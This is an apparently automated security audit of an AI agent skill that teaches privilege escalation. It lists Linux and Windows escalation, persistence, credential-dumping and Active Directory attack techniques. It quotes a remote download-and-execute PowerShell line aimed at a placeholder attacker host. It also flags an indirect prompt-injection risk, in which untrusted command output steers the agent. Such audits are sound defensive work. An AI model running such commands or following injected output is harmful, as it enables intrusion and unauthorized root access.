privilege-escalation-methods
Warn
Audited by Gen Agent Trust Hub on Sep 17, 2026
Risk Level: MEDIUMPRIVILEGE_ESCALATIONPERSISTENCEREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONINDIRECT_PROMPT_INJECTION
Full Analysis
- [PRIVILEGE_ESCALATION]: Provides specific instructions for abusing sudo permissions, SUID binaries, and system capabilities on Linux to gain root access.
- [PRIVILEGE_ESCALATION]: Details Windows privilege escalation methods including token impersonation, service abuse, and exploitation of specific privileges like SeBackupPrivilege and SeLoadDriverPrivilege.
- [PERSISTENCE]: Explains how to establish persistent access using Windows Scheduled Tasks (schtasks) to execute commands periodically.
- [REMOTE_CODE_EXECUTION]: Includes patterns for downloading and executing remote PowerShell scripts (e.g., iex (iwr http://attacker/shell.ps1)), which is a common technique for executing unauthorized code.
- [COMMAND_EXECUTION]: Documents extensive use of sensitive security tools and commands for credential dumping (Mimikatz), Active Directory attacks (Golden Ticket, DCSync), and network poisoning (Responder).
- [INDIRECT_PROMPT_INJECTION]: Ingestion points: Command outputs from system enumeration (sudo -l, getcap, showmount, etc.) in SKILL.md. Boundary markers: Absent. Capability inventory: System-level shell execution, file writes, and network operations across all documented techniques. Sanitization: Absent. The skill represents an attack surface where untrusted system output could influence the agent to execute unintended privileged commands.
Audit Metadata